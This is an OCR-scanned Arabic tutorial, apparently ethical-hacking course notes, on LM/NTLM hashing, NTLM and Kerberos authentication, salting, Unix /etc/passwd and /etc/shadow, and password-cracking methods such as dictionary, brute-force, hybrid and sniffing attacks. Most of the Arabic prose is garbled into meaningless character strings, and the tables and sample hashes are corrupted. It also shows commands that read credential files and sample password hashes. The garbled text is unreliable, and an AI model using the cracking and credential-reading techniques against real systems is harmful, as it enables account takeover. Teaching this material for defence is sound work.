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J^i q\ 4<-ij^Vl ^Lu^ .Unicode ^j^l ^il^j (NTLM) Windows password 

^hOj! j^. Ja^IuAj I^jL ^jj £>i& jjoJI .Windows OWF m jjj^W ^ ^ OWF j^^ 3 ] ^ >^ ^Jjaj .lij^ 128 

.RSA MD-4 jaLSall 

^Uail ^^jjaljiiaVI ^l^cVI 11a . jj^jjjlt CjljlAk^al ^ ^j^xJI valid LM hash cs-^ jjj - ^ l - oO*^j *^^] lSj^** ^ 
J*^ LM hash uj^ ^ CjI jl^VI ^ 16 Ji jjSj LM hash .Windows 7j Windows Vista J^ull 

LM hash ^ Jjjj V a£1j < j^u aJLc J^U. <JL±\ cjL^ j^i c j£*j LM hash jW^I .(disabled) 
jjj^ a aK^ <J ^jjjJj SAM o^clS ^ "dummy" jj^j <jaLjaj cjL^a j^il! jlrk .SAM 1 aUli ^ S^j^j-* 

^ "dummy" LM hash <^ ^ -^j^ 14 c> ^j 2 g?^ LM hash V 

^5^} Password hash using LM/NTLM 
Jhi^ E. , ,,1 V Martin/magician V i*4fc 



Martin/magician Martin: 1008: «24JUkC413-S5CDCl 

4E335F1CD90F4C76: 6F5B5FF8FF6 



280B5 9CCE252FDB500EB3 : :: 

?LAN Manager hash (LM hash) j* U 

Microsoft j Microsoft LAN Manager t> l£ -u^i^j ^ill g-^jll jl JjVl <j£l$ll j*> The LAN manager hash 
^vim* .(length up to 14 character) tij^ 14 J cjli ^^ki^JI cjUK jj j^sl Windows 
^jj jSlj ;4_ialjj3l J^l ^ Windows c> ^->^VI jl^aVl ^ j^tj . Windows NT^j Jj^j ^ jl^-^) 

Windows NT j LAN Manager (LM) password : <> oFjj <jj ^ Microsoft Windows NT 

'LM aj^Jj'j^ e ^ jj^ 1 (4; .' 123456qwerty' j-JI <^ u 1 a^j^ 'J^l Jj^ ^ .password 

L_ij^S ^ ^ t Uj^ 14 j J>a ll U£J>o^ Ijj .' 123456QWERTY' :« <-ij».i ^ J W-b^ <4i ^ 
.'123456QWERTY_' '^S\ jl o^jiij a^jJI e iA ^ .lija. 14 l*J> W (Null\blank character) ^fcjl* 

^ lIjjLj 4jujoj J j! 4_L.iiL.i) (^^-ixj I^A j .7 byte JJ^>^^ ^ ^ 14 a^>^-Vl ^> j > nVi ^li t jjq>*>n Jj3 

i^VI^ X^io ^^^j *^ ^ >> ^ >>1 (43 ^ WERTY 1 ^ ^W 3 ^ 4-*^ ^ UuiUj '123456Q' 



5" Microsoft 1 



1Z3456Q = GB F 1 1 E04AFAB 19 7F 
WERTV_ = F1E9FFDCC75S75B1S 

The hash is 6BF11EQ4AFAB197FF1ESFFDCC75575B15 



^jj magic number " ^—y^ DES j^Jjj ^jj .cIjjIj DES ^l^j ^jj cdjjlj ajujoJI i ^^"i ^ 

jll oL^jVI djli (j^l^Jl <Laj£3l .cIjjIj 16 j (JjjIa (jjj^J " magic number " ^cjUj 

^jjIjSI dijU 8 (jlSiSI ^ijj J jVI j^i 7 c> J j^^ (jli^l ^ .jj^ ^-^(LAN Manager) 

^1 ^iml ^jj . oxAAD3B435BS1404EE^^ ( <>^t j' ^ 7 c> ^jW^ 

<jl£ lit tJUl<JI cJ^f^ c^c- '^-^^ ^jj^^ c ftju^li jjj-^ diLalS ^yA^l^a (^Ic cJ^-^^ u - ^ 6 LM jjj-^^ jIaK 

JJ>a ]| cjLJS ^£ j^ki jla « OxC23413A8AlE7665f AAD3B435B51404EE6- LM M ^ M fJii-ll 

.j^JI o» 1^ JJS1I ^ " WELCOME " j-ll ^ t> i-iSSj LC5 

^ ajj^JI Cjljl^aVl .LM hash j ^^lun cJI j 1^ c _^j3I ^hill Jl Jj V jjoj tjljlkVI j ^ (jli ttilli .<j <L^aLkII 
jjajj ^ijj _4 rtiViVl ^^ic LM hash ofi ^ ^1 ttilli ^ C5 i^. j ^Ujjaljjal LM hash ^^i>>ri V jjAbj 
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cilia ( . lilaJ L5 ^\ jill ^ ^1 ~\ L_fl5 jlill jl tAjfijjll Lajb Ale t4_njt_^ m A aJ tell ^Jaill £x» (jjfll jlll! ^C-J "S j^l" 

.jlaai] lg-L^L a£jj^3I U i^pall 4 LM hash * ^ 



cJij^l 7 di^ .JaSa CiLj 14 J^j ^1 aj^UJI LM ^ 16 J> ^ LAN Manager OWF ^ 
cjjLj 8 i> 7 j LAN Manager OWF c> J jVl 8 ^^kia£5 J jVl 

LAN Manager OWF <> 

AjiaVl ^UbjbU ^Sn (challenge/response authentication)^^ W<i^j^ Ai^U^ JjSjjjjj NTLMv2 
J) LAN Manager AibL^ Uy>\\ ^ jl^ ^Jaill £>i& jli ^UJLj m( y* jll l^J^ Ik; ^! LM Jj^jj jjj 

.Send NTLMv2 responses only 
(LM "Hash" Generation) LM o*U *LiW >l JliU 4- 

jjj^il Windows J^ult ^ CjI <> :lja*1I Jj£ <> ^^i^j LAN Manager Hash ^ ci^j LM hash 

. (cehpassl)^^^ jjj* LM Hash c^ju .^j^ 15 i> JSi ^ ^1 j^JI cjUK 



Padded with NULL 
to 14 characters 



Converted to 
the uppercase 



Separated into 
two 7-character 
strings 




^ $ci ja.Vl ^ c> ajU. ^ui J* J) p CEHPASS1 J ^ ^ ^ ."CEHPASS1" 

UoiLoi iulSlI UoiLaili J*^l .JaSa cJ» UoiLJi ^jl^ dii^" i ****** CEHPASS ' uj& u 1 * 6 J 1 ^ 31 

jjjL t*Ui ^LM lA* 4 * J^' J ■ (symmetric cipher)^-*^ CjljLill (Digital Encryption Standard) DES 

.u j^""* (DES-encryption) lP 3 *^ W^j 



https://www.facebook.com/tibea2004 



LM, NTLMvl, and NTLMv2 ^ 



t*Ui jl£ UK ikU cjcJj ^2 NTLM ruhjc <NTLM1 J j-**' J£L2Lall ^JU^3 



Attribute 


LM 


NTLMvl 


NTLMv2 




Password Case Sensitive 


IMo 


YES 


YES 




Hash Key Length 


5Gbit + 56bit 








Password Hash Algorithm 


DES <ECB mode) 


MD4 






Hash Value Length 


64 bit + 64 bit 


128bit 


128btt 




C/R Key Length 


5 6 bit + B&bit + 
16 bit 


5 6b it + 56bit + 
16twt 


12 8 bit 




C/R Algorithm 


DE5 { EC B mode) 


DES (ECB mode] 


HIV1AC_MD5 




C/R Value Length 


6 4 bit + 64 bit + 
64 bit 


64 bit + 64 bit + 
64bit 


L28btt 





NTLM Authentication 

t Jj^ijj J^u-fcll ^Uaj J^*-^ c j^jj 3 jj Jll cj\£jj^3I J ^^kiaiJI AS^L-aJI Jj£jj jjj NTLM (NT LAN Manager) 
<9jL-^I ^Ikj j < (challenge/response) 4S^-a* ^Ij^-V ^ CjKv^ ^ ^ja*JI JjS j-* j .<l£Lui>JI ^LJajVl Jc- j 

CjLjjflJ J-***-^ <j£Lui* A -\ 11 t <^ 11a jjjlaj ^aJ ^ j -Ci5 Jai£ J^)J1 ^La. CjI aola j difl jjui jjfLLa AjLaa. ^Aa^LuoJ ^^^jJal jJ^Vl 

t ^ J£jaij <j| (j ^ > ^» j ^ ^^SUa (JjjJs t^^^joj^)!! <J j£ jj j^>Jl dalij^ai l$\ jj V i^>^j j .Microsoft J 

Microsoft u' t> J*' ^ . J-^VI NTLM ^k>l c> ^ ^ j*- Microsoft Kerberos * 

i-JajVl ^ J j^^JI aS^L^J NTLM ^I^IojI Liajl .NTLM ^ ^jj JIJj V jSl ^ jUlkVI JjSjjjjj Kerberos 

A\?u*A\ 

^^kiaix» Ai^L^J jLUI (challenge/response) Jj^j^jjj NTLM ^ ^'^"j .^Ijll &UjV! ^li ^^im^ l ^Uj 

. jjxuiaJl NTLM 

.IM authentication protocol j NTLM authentication protocol iu^j^j^ jj^ c> NTLM authentication uj^ 

.SA1VI O^C-IS J ^Ld^JjalxJl JJ^ ( >1 ^jj^^j] 4 alia A ^JjjlA A-la g Lq a lalLuJj CjV jJj^)Jl 

NTLM Authentication Protocol -4 

pbl J ^ Ujjii l^S (non-MS product) c5 j^-^^ cj UVi^ I jli t MicrosoftJ^J^ <^ ^ J 

JaJaa-xJI 11a ^in ^Jl^libraries) 1 " ^ * ciAiLa ^ jj V ^4_1£jouJI (jjoij ^j-d j^j^ J -C**^ 1 ^ cJ^^ 
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liL^. tilLaJ £>i& Aia« a (j^lj 6<J J^J^)^ 

Axusu ^^jll 4_ijjlxj3l Clilknialill Jju^J JJjiaJ (J^^ ^ *JJ^*^ <J^-^ Mf 1 "J (J' lil^Jl a 1 gala ^£ <S^L^aH UU^ a jSl jJ ^a^C 

.HTTP J>jjjjj ^ a^Ixj ^1 SOAP mjjII cjL^ cjUjE 

sjIc aJ] jUj ^JjI^j cj^j <> jj^L 6 (challenge/response) (NTLM Authentication) NTLM 

Lu.Lu.1 lUxj .([authentication]^-^!) 3 £>>j ([challenge]^^*) 2 [negotiation] o^j^O 1 

# ^Lk!l ^ l— ulL j ^lulI! ^^j^ ^— ^j^W 4-*^ c^^c- cSj^d ^ .^LJI 1 ^ jill <JLojj cJ^*-^ lS^j^ -1 

ttilli ttilli ^aVI .^llxJI (JjS (j-<» l^jlc ^il<JI CjI *LajUi ^^ic ^jl^j li&j .2 ^ aJLojj ^ t ; u^Lolj ^IaII -2 

.^iLJI ikJ jj U jlijj ^ ^ill j challenge j 1 ^ 

^ Loj 6^1^x11 J j^. CjUi jIslxJI ^ ^j^-t (^Sc ^jl^j li^j .3 ^ <!Lujj challenge ^5-^ ^j^W l5^**^ -3 

NTLM Authentication Process ^ 

NTLMv2 j <NTLMvl 'LM : (challenge/response authentication) i> s^-J NTLM 
^^ic I jjja jlijj ^Lkll j cJ^axJI 'NTL1VI > ^ ^ . jj^unti ^5 jlaixi j& ij i jll (j^>i3l j .l^joiij c . nil mVI ^j^t^ <a^U^<JI 
. Microsoft negotiated Security Support Provider (SSP) c> ^ <4ls J^jjjjj 



^ <JL^.j| ^ill JJ^>^^ ^ lPW^ ^UjdjU ^aj^Jj (JJJ^Ji "SH^jj^ l!^^' (J -0 JJ^>^^ A-<^ ^IXjolL jjAlJj ^T_>.*>u3l ^Uaj ^ajflJ 

.Jj-oaJ! jj C5^) ^ ' " J.» j "nonce" ( a5 -^ > - > ^ <«— 16 j j ^ iC * ^^^^ 4_LuJjuj Jjj ^ixij^ll 



j^ll j <!LojjIj ^^jjoiaII jjj-« (JjjIa ^ nonce jj^^j lS^-**^ jjj^ 

<x»jk3l j .nonce ^'^^ ui jj SA1VI ^a^Lu^I jjj-« jjlaaj* ^jj-g jJI j 



O 
O 

O 

o 
o 
o 



£3a 



[ I Client Computer 



Window Domain Controller 



User types 
password mi a logon 
window 



Martin 




Hull 
Algorithm 



Windows runs 
password through 
hash algorithm 



Martin; ID DB : fi24UCAL37 9S<X>C 
1 4EB35F1CD9DF4C7 6 ; 6F56 

Fe^anfiF5^f:rT:?.s^F i r>FL r aririT3=iH : = : 



Computer sends login request to DC 




A-a c6 ppq pqr 




Domain controller haiaitored copy of 
the user's hashed password 

c \ 



2&OB59CCE252ET>B5DC^fl - : : 



DC com pares computer's 
res po n se with the respon se 
it created with its own hash 

If they m^tch. the logon is 3 

success 



DC sends logon challenge 



Computer sends response to challenge 



1 



Note: Microsoft has upgraded its default authentication protocol to Kerberos, which provides strong 
authentication For client/ server a p plications than NTLM. 
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Kerberos 



djllnkill jja jti ^ j . (network authentication protocol)<^ll Aii.^ JjSjjjjj yt> Kerberos 

<J£ (j-a lii^lj - i^jLuiaII j ^Lkll ^ <J£ ciiia _4J^\_£LoJI <a^L^a>JI j^jj li&j .secret-key cryptography ^I^jLuAj ^l^l/Jj-ajtll 

t dij^ailH j ^ixjaLill s^lcj cj! 4 a Kerberos cJj^jj* cJ^^ ^lu^alt lS^-^^)!! .^>^^ U^i* 

t> uj^ ^ c3j^ ' (e^L^ <yjj^ Key Distribution Center (KDC) ^l^i^l t> J*^j Kerberos 
.(Ticket Granting Server (TGS)) jSliill ^ia ^U. j (Authentication server (AS)) 43^-^*11 : M^aLa j jL^aala (Jjwj 

.^kiu^l ajja CjUjV " (tickets) jSlislI" cUy Kerberos 

4ii_^ll a£ jL^ ^^kj ^ill Ticket Granting Ticket (TGT) ^ v^ .. mN * ji Jc :ui*j Kerberos o^.j& M 

Jj <J jj^ jll (_£^kl aj-a JJJ - *^ 4-aK (J^-^j Sjlfirj ^^JjoixJI t . lilaj V L^l ^ J-*H J J^^l ^ m a CjUi^k Jj <J jj^ jll 

(KDC) JJjlLalt £Ujj* j^J^ J CAiulajlt ^1 ja. (jJJ JJ^Ua (JIj^jI cilLiA (jj^J (jl 4jl JaA»5U <jl ^ all (j-a .l$l (jijJ Jill djU,lkll 

i> JaS jjSj 3^ikil Jj Jj^ajllj <TGS : Ua^l J j (packeted) W^j^ ^ jl J^ 6 jSlisl! s Key Distribution Center 



rC 



User reque&T Lulhedulhe-rtLiilAliOil i^rvur 
Reply off authentication s 




to tile user request 



Request lathe T<S&for e service ticket 



Replv of the TGS to the dent's, request 



Key Distribution Center (KDC) 



In 



> Authentication Server 
(AS) 



-> Ticket Granting Serve 




(TGS) 



Database 



Request to art aupiicaiiofi server co access a service 



Reply to prove it realty ii the server thi* client is, ^pec-lmg 




Salting 

l-jL jjj-^11 i— al L_a jj^-SI (j-o jjuoc Jjuj!>Ljj <iljja] Jj Ja (jc LLgI jj^Ji i— al «ftK ci*-?^ j Salting 

.pre-computed hash attacks 6 ^ .lJj^^I! ajj! jj^sJI AiuoLoj J ^u*j CjUK CjU^a 

U jj^ j &Uj! J Jj cj^LkAJI ^ ^" ,, n Jll (random bit) ^ jj^ia salting ' j^^' ^ J 

i> ^ j^J^ o-^^ c> ^1^^^ ^3 key derivation function Jj Cf- jjj^' salting ^ 



4 ;* - all ( ^ <^K JjlAI ^1 g ^11 Jc 4 a$ a\\ 4-Jjt > (j-a ^jjj li^j . JJJ-^I 4_aK ^jjoiil ^ alia a dAjuAA ^1 jJJ (jl (j^J <Jjjjll oi^ £a 

(J^l Jl JJuic (jjjlA pLudjj ^aJJ Cilia m A alia a (jjjU ^ajS £x» (j^lj ^*ill ( d ^K (JjoSJ 1^1 (JjjaaJjaJj (JJiill ^jA^AaJLudAll (j-d (jjjjlj 6(JHa1I I1a ^J 

)0^a. Jc a iklLal^ 
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Salting teth n i C| u e prevents deriving 
pa 55 \jv ords from the password file 

Stored rep resentation differs 



□ 



Advantage: Defeats p> re-co m p> u te d hash 

t t Ckb 



Al ice: root:b4ef2 1 f 3 b a 43Q 3ce ^4 a 83feO 3 17 feO SdeO Z bf^Sd 1 - 
B oh :root:a9c4fa: 3 282 *3 hd03 OS 33 3 efO' 3 19 dc7232c 349 ac 



Cgdl:root:2Q9b&l [a433 b3Q3c 23 af 34 7 6 1 deO?be038fd^OR 



f - - ~ 

I butdiMew 

>^ 



Note: Windows password 



les a re 



) ot salted. 



(j^^jjaixJI (j A a hx a cijl jLiLdl ^ aS\ '[(user model)] ~ ^^^1 j-^j ^'^^ j lILoiLloJI £>i& ijiij 



Q^tj^ ^ jj^ ' [(user model)! ^i^lu^t ^jUj 

<j| ^1 ^ill ^^kiaiJI 11a ^(authentication)] ^LuaJI/jlSjiajVI jA J jVl 
J yr^ ^jM 1 yr* ^ ^. Wim^ l li* lJij^I ^1 jV! :[(Authorization)]^>^ jA yr^j 

[user authentication] c> JjVl JI>Jt ^ ^Jl 
.Aii-^JI ajja [(account information)] CjUjk* .k>j J^Lk ^1311 ^Jc ij\ 

/QiuuVI JjlJ /etc/passwd ( CjLjja a (JjAjjj iIla^Lui) cLikjjLj 



[ e 1 v i s @ s t at ion 1 ] $ cat /etc /pas swd 



j ulius : hT5 j j pGzIu . F2: 500: 500: 
pataki : yT7if gqMAkaQ . : 501: 501: 
elvis: zTDZ7mF286Pil:502: 5 02: : 



: /home/ julius: /bin/bash 
: /home/ p at a ki i : / bin/bash, 
/home/elvis : /bin/bash 



maxwell: . U2 cbRqM 1/ YF Q : 5 □ 3 : 5 □ 3 : : /home/maKwell : /bin/bash 



.[(account information)] ^l^JI cjUjkaj [(authentication)] ^SjU^aJI <> ^Ski /etc/passwd £A±£** 

."(jjjjalt jjj-aJ! 3 (^iikcl t^joLiill lil" : [(authentication)] ^a\\ aAat* ja jj (^p^ll 11 <^i) Sjiui^l 3 

.a] jjsVI lWI ^j^j home directoryj GIDj UID :u^' ^ ^" »» i^ t c> CjUjIx^ j^jj /etc/passwd 

[(shadow passwords)]ci^^ cjIaK ^^-^ ^ujij ^ ^^j^l cIa^ j s&j ^^Vl ^5!^ HIS j3£l (Jj^jj <xJaj| daaj^ai a*j Uua 
.[/etc/passwd] ^ X ^ [/etc/shadow] ^ ^ 



[elvis Q 

— trvij"— r 

— if 

bo b : x : 5 
p rince : 
ho gan : 

[elvis@ 
tail : c 

[elvis @ 
Pas swo r 
bob: $1$ 
p if i nee : 
ho gan : 5 



s t at ion 1 ] $ Is — 1 / et c /p a s swd / et c/sh adow 

if 1 root root 2118 Jan 5 22: □□ /etc/passwd 

1 root root 17S7 Jan 5 22: 01 /etc/shadow 

stationl ] $ tail —3 /etc/passwd 
10:510: : /home/bob: /bin/bash 
x: 511: 511: : /home/ prince: /bin/bash 
: 512: 512: : / home / ho gan : / bi n/ bas h 
stationl ] $ tail —3 /etc /shadow 

annot open Vetc/shadow' for reading: Permission denied 
stationl - ] $ su — c "tail —3 /etc/shadow" 
d: (root T s password) 

TQDu0v4Y$es6TNbzi0BTfdhE Pirhlo . : 13 15 4: 0: 99999:7: : : 
SlSYQJaM/ hi $b j T 9 lXc . GudbBzSAO d IF C 0 : 13 15 4: 0: 99999:7: : : 
l$t7HZVQHkS rwrENrqtO . O/wtj l PevspO : 13 15 4 : 0 : 9 9 999:7: : : 
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?passwd £-a"apple Tf jjj* ^ 4- 

cjljkaJI f Ij^l passwd >&l 

"apple" : [(plaintext)]* jj^ ^ <-Us ^ v^m^ l 

[fSapple] 511a >JI p^ja [salt] ^ ^ j < J' j^- u^j^ ^ c-U^passwd 
s^lc) Xk±i^A UaIIc Aij^sLxJI <1uJjuJI (jy^ia (jc Ia jjqunl [salted password] jjj - *^ ^l^kiujl ^il ^1 

[cyphertext] .[aHBT91IoaZc] ^ 1 1 <> >J ^ <> 
/etc/passwd^-^ J uJp^j 6 cyphertext J] <^ t> u^j^ c^- cUs passwd j*Vl 
^ s j^Vl la 1 1 j. jj^JI JSa. J CjUjIxJI ^> oA*-^ J u 3^ /etc/passwd^l* 

.("F8") ^ J ^ cyphertext ("aHBT91IoaZc") 

V^^ji]) ^Vnndll Jl fUaUl UHp IjU ^ 

"apple" :*6ji*l<i j^*-^ ^ j Jc- J-**^ lv^' ^^louJI 



[root@ station 1 ^]# passwd elvis 

Changing password for user elvis. 
New UNIX password: apple 
BAD PASSWORD: it is too short 
Retype new UNIX password: apple 

passwd: all authentication tokens updated successfully. 
[root@ station 1 grep elvis /etc /passwd 

elvis : 8f aHBT SlloaZc : 5 02 : 5 02 : : /home/ elvis : /bin/ bash 



. jjj-^t ls^I fjLj /etc/passwd c>[salt] ^1*11 i> o£ j*^ Cf- ^-^^ 
1 1 uj^ 5^ ^ J [salted password] j^JI cyphertext jj^t ^Ikj ^ v^ .. n 

.^jljlb ^viui^ ^oij < jjlks c^l£ lij ./etc/passwd J <^ ^ ^ J) cyphertext ^U^l ^ jL ^ 

Password Management 

« cypthertextoLP^ [(shadow password)] J^l cjUIS ^l^ki^l ilpaJI ^Aiil ^Jij! <d j£i U£ j 

.(Ci> 56) = (cJj^ / Cij 7) * (lJj^I 8) ASCII: t> <-ij^t 8 jjJI CjUK r^n^l t^Ull <^nj j 
^iltj U-Jaj jisSfl j ji i ffll f ^l i nj ci^Jlj '[MD5 password] MD5 j^i^t ^jj'j^ ^ iVmn ^jJI ^-^t 

jl md5 password f <£>*M fSjM ^iVhim ^Uaj ^ cfej^J ^Vmn system-config-authentication SbSft 

Jjj^ij cjUjjj JjLiUI ^4 shadow password 

./etc/shadow cyphertext Cxj^ & «Vj 



[root@stationl ^]# grep elvis /etc /shadow 

elvis : 5 l?CBYGbXRT ShTMRCO ludINgdlLH/9quul : 13 15 5:0:99999:7::: 



.("$") 4-k>.nl jj j^oij U JjUaj j^-oJ CjVU^ Aj^Ij ^MiVn jVl MD5 ^jLUl jjoJI tUjlj 

".1" JjSjJjjj jAj. MD5 J^^i J CjVj^jJjjj Jj A] j^oij lS^J^ aJI j^jJj 4 Jj^jj jjJI cJi^ j& ("l") J jVl jSaJI 

a j^l 8 JJ oVl c^jijttj c^U! jA ."CBYGbXRT" ^J^l JUI 
.jjLSfll^ cyphertext jA ^ xTMRC01udINgdlLH/9quul" * j^Vl cWI 
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PASSWORD CRACKING TECHNIQUES jjj*M ^UlS juS cjLufc 



ji jj jjj^m ^Uail aj^jjuj^I£]| CjI jbiftVI < r iJua£J lW^I j& I^a . jj^Jl CjUJ£ c fll *rftV ^Ld^kiauJI ^jVqMI c _^& Password cracking 

m A ^Ja - ^ ^Jl (Jj^a^J ^ alia a ( ** )l 9j3 jJ £xa JJ^) - ^ (j;lA^J 4_IjL^g jl^alLail j& ^)J^y* til^jlLouJl ^_l3l AjuJI 



Dictionary 
Attack 




DICTIONARY ATTACKS 

^^kiuij ^ill (Cracking application) ^dictionary ^ 'dictionary attack ^ 

J£ ^U^JI ^AaJLujj .(dictionary word) cijIaK ^ ^^ic ^ji^j ^^j^aj t aL> j& c aL&li liA .^j^^kiouJI cAjLoia. 

(brute forcing attack). <*&\*1\ s jill CjU^a s^li JS! Dictionary attack ,>JI <UK ^ jj^ 

.passphrases ^1 <^)2\ lU*^ V ^j^JI li* o^lj 

jsAa ^^UJI (j-^aill J jj^a^Jl jjLjUH t^Sfl <a^x-<J ^LqIa^LujI ^jj ciii^ i (cryptanalysis)**-^ jsJoll l!^^ ^ 

.(ciphertext) 

. jxA\ cjUK cJ&j^ j^j^^^ jW J) Jj^j^(authentication) aS^-^ < jb^ 6 j^j^^^ i>t 

: dictionary attacked o^ 4 ^ 
jU ^ ^Luj foreign dictionaries j Technical dictionaries dictionaries i> ^ ^I^L-I 

4 aJa - all JJ^>^ 

system ^ cSj 1 ^ lkj*^ ty 'dictionary (string manipulation) oaj^ll gll** ^l^ki^l 

.Ia jjc.j" metsys "^l^aJLual j <LaLaJI <^Jlx^ J jUj < — * 

BRUTE FORCING ATTACKS ^ 



. {brute-force attacky^^ * ? i> Uj uLjj j) (cryptographic algorithms) j^iJl Jj'j^ 

^uiUJI s jSII d^j ji t (Exhaustive key-sear ch)<^-^ ls " :(RSA)^ jj^^ ^l^aill ^ j j^i US <9j^>»j 
. "^jau^all ^-ULJI ^jj C5 la h oS-^ ^Ui^ JS ^l^kiojl 5J jl^xJ ^LojVI jLujVI '(brute-force search) 

6 jail ^Lilc (^^^ U I^A j ;<Jjlia>Jl CljUi jLlxJI ^jC L_LaiS3l ^aJJ ^1^. dAiUill JJ° uaJ ^-UL<i <j£ ^tjlj Lo ui (Jj^J U»Ajc 

<jL c^laj t^iUJI 6 jilt cjL^j* ^ jl ^alS (DES) ^ 56^W jW*^ (1977 ^ c^) jll ^ 

^IxJl ^L^Jl ^ia^. ^ CjIc a <il3i 

^jjILJI ^j.^ djUxjj . keyspacec^^- ^-^UJl s jill jjq/nMI ^^ic ^UuiUJI s jill ^ j& dj| jLill 

<Ljia ^1 ^ ja. j AJla. ^ ^1 jA [cipher] jiuj-All o^Jt . [cipher] jAAaII ^-U^ j j^^-^ <aJjUl!I s jSII ^ 
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^yiuirtlt <jjjaUj3l ^uIaslSI ^1 ajj^ata (ciphers) jj^aill J£ u . ilUJl .^JjUJI s j£3l ^ j^a jjc. jjq *nll 11a 

^1 I^LujI Asu ^llLo gaJ L_fl jjuj tJajui jlxJl t^^lxJl (j^aill <jl£ jjujC cJ^joU L— La ill j! jjoiC <L^)laJ ^1^1 ^jj! q a lit 

A '&a*\\\ ^cjjli-a (^-^ C aj^aj 

I^UUt jail) ^Jfc 4_4*uiliJ! d jil) CjIa^A Jj^ l^i jju l-l^j ^1 CjIjLj&V) c>a*j 

LM hashes t> s * > ^ yr* NT hashes ^ cjU^JI 

HYBRID ATTACK CitM^ f JW* 

<j^aUJi a^ jjnij ^ (jjAill CjVUu^I c*Jja .(Dictionary attack) f ? i> £ j^' ^ 

4j^aja c*1Ua i "system" ^ a^Ss!\ jj^>^ a^& li! t<Jtl<J! J^f^ jju£ JjL^jj Dictionary Cy* 

."system2" J "systeml" Jl o«^l J 

SYLLABLE ATTACK 

. (dictionary attack)LK>^1 fj^j (brute force attack) <*&*1\ SjSlI <> J£ <> ^jj* y> Syllable attack 
_<Jc. ^Ljakll jj^Iall Ia jjc.j dictionary I "j uj^t^ <s ^ j - * jjj-ail U»Ajc. l_j jLujVI I^a ^ i^iLujj 

.dictionary ^ *^ j - ^^ <^1^1 ^ <<^^i cjUj^jILII ^ ^ajl - ikiLoaj 

RULE-BASED ATTACK J&ljS jILu^ ^ 

. JSi c£j a^1\ ^ \ i^uol\ CjUiiSI 

'brute force <*-^<^a lUAj m ji^Vl li^ . jjoJI djUJ£ ^I^jIojV jjuo^II sl^l qiu^i j ^^Vl .^Jl jj^J^ ^La.jlujV 

. syllable j 'dictionary 

TYPES OF PASSWORD ATTACKS 

^vimi jjo£ .^Ikill <i^aja ^ 4 «\ uiK J^I^JI j ^ (Password Cracking) jjj^ <^ 

;^A j ^1 jjl tilLiA (JjSj Ui S^lc . jjj-^I 
Passive Online Attacks -1 

Passive .^-^-^ Jj-> > >n j\ AjL^c ^jc ojUc j& . Jl^JiVl cJ^ 1 ^^jJ' J^f*^ l£^J1 ^ ^Uaj ^^ic j^A jA 

ia^a Axusu ^Uaill JJ-^ AjjL^xi ;4_iisLxJl L_fll^)JaVI (j-a (^1 ^ Jclili (jl (j^J V ^)fljua3l (JjI^J (jj^J ^^A jjQ ujJ C5 lc attack 

Wire sniffing 
Man-in-the-middle 

Replay - 
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Active online attack -2 

fj\ J j>^JI ^ J*- ^ c ^ ^ (Active online attack) Ja^t ^ >"VI Jc ^ j^JI 

j .tlAjjljVl Jc 3 Vi ni ill CjU^JI ^1 jji ^Ua .^Uaill 
Password guessing 
Trojan/spy ware/key logger - 
Hash injection 
Phishing 
Offline Attacks -3 

^Uaill jjj-<J1 ^jj^^j 4_i<L£ Ja^iLi <j| dia „ l " d ^ A ^ 1 ^ cj^^j UiAic Offline attacks ( - ^ ^ ^ t>v ^* 

(ja .^Jaill J] <J jj^ jll Jjlk^ll Jc cJ&^l L>* U^>J (JjIS c flLa JJ^>^I ^ ^ J (Jjrt'V^H'ftti ^JJ^^ - c V^lm^ll 

>-^»l keyspace uV ^ j LM hash * <> .c^S jU jj^i U LJlc. Offline attacks 

Offline attacks Cy* aJu^1\ jl ciAjjSj .diijljVI aSliA C5 ic jjj-* jj"^ a alia a ^Ujjj j^ij .V jj^SIj \ ^ a 

Use good passwords 
Remove LM hashes 
Attacker has the password database 
Use cryptographically secure methods while representing the passwords 

j .Offline attacks t> 

Pre-computed hashes 
Distributed network - 
Rainbow ■ 
Non-electronic Attacks -4 
liA . (non-technical attacks)^i&]l ^ ^jj^j j^' cjU^JI Non-electronic attacks 

Shoulder surfing - 
Social engineering 
Dumpster diving 

Passive Online Attack: Wire Sniffing 

^L^ill jlkj ^ Jaiia Jaxj jl jSaj sniffer tSUi j ^ j^JI ^ (packet sniffer tool) ou^l cj! ^l^kl^l ^ U I ji_> 
.bridge ji switch c> ^ j^Jt (collision domain) ^L^sS\ CjVU^ iajj ^ V .aS jiUI (collision domain) 

^UaS ^ bridged ji (switched) f^j^ ^ V ^ u j^ > ^^ 5^ 

: Collision domain 

'(switched)^ jj^^ ^Ia^LujLj <J£Jl<JI Ja. o^jj .lan ^11 a£jJo3I ^uij ^ jl (HUB) u»I ^jUlkVI ^clL 

^jij(router) ^ ^1 ^-^^ ^ ^ cJISj ^ ^L-aSlI JLa^a ^ j^j I^jI ^-^(router) ^ (b ridged) 
g^a Jj^jil Jixla jSUil (jhhiVi ja. ^l^kiajU ^UlkVl J^-^ ci^ u^-^ (broadcast domain) ^— ^ ^j'^j 
(Carrier Sense Multiple Access With Collision detection CSMA/CD). ^l^t q^aj 
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:Broadcast domain 

a£jjoJ1 j* l£^>^ ^ J-^j^ o I jl Lan ^ ^ a£jjuJI ^Jak* (jjoij Jc jj£j jl ciull ^Uail j£-GJ .^1 jl j-^-^ j^ ^—^-^l 

jUU 4,4 

Collision domain jf^ ^ l& Jj broadcast jf*j j^j^ i> o*^ J-"' l£ : j^jt 

. Collision domain j£s j 1 ^ lSj broadcast Jc <K io^jJI 

.Collision domain jf*^ Jc <K :Hub 

^>JI Ail£ Jc L^J <4a 6 Data Link Layer^-M^ -^j ^LJa J ^ >JI ^ packet sniffer tool ^ 

cillij .UjLud^. SLu* j fijjijj Lnjoij L-ixj j^ l_j jLojVI li& .Sniffer g^j* lS^*-^ ^jIj ^ill (LAN) ^1 Jc 

jjc I^SLoj jj ^jj CjUUj ^1 dii^ .ajI^JI a£jj^3! Jc ^LJijVI I^ja ^ jiA3 Jll broadcast medium ^ HUB a£jj^3I jV 
Jjt nnj ^l^all ^IS lili .LAN AjIkUt ^jniL <L alall ftj^Vl J£ I^SLujjI ^al jll J U$i jj** Jl^ Jl d\ a^u%\\ 
4<>y*\\ Jc j^l flk> Jlj j* 4luijJt CjUUJI (j\ j£*j ^la(LAN) ^iLkWI 4<>y*\\ Jc flfej Jc Sniffers 
passive sniffers cjIj^Vi ^Ia ^^jj .hub ^ J cMjJI <^Aia ^ (Sniffers) u > i >> o*^ ^jIj^I <±M> 4A*xl\ 

cjl.nkj ^FTPj Telnet **j*A\ Jj 31^ jxll jjJI CjUK l^LlislI ^ Jll CjUUJI j! o^j .LAN c> ^3j^ 

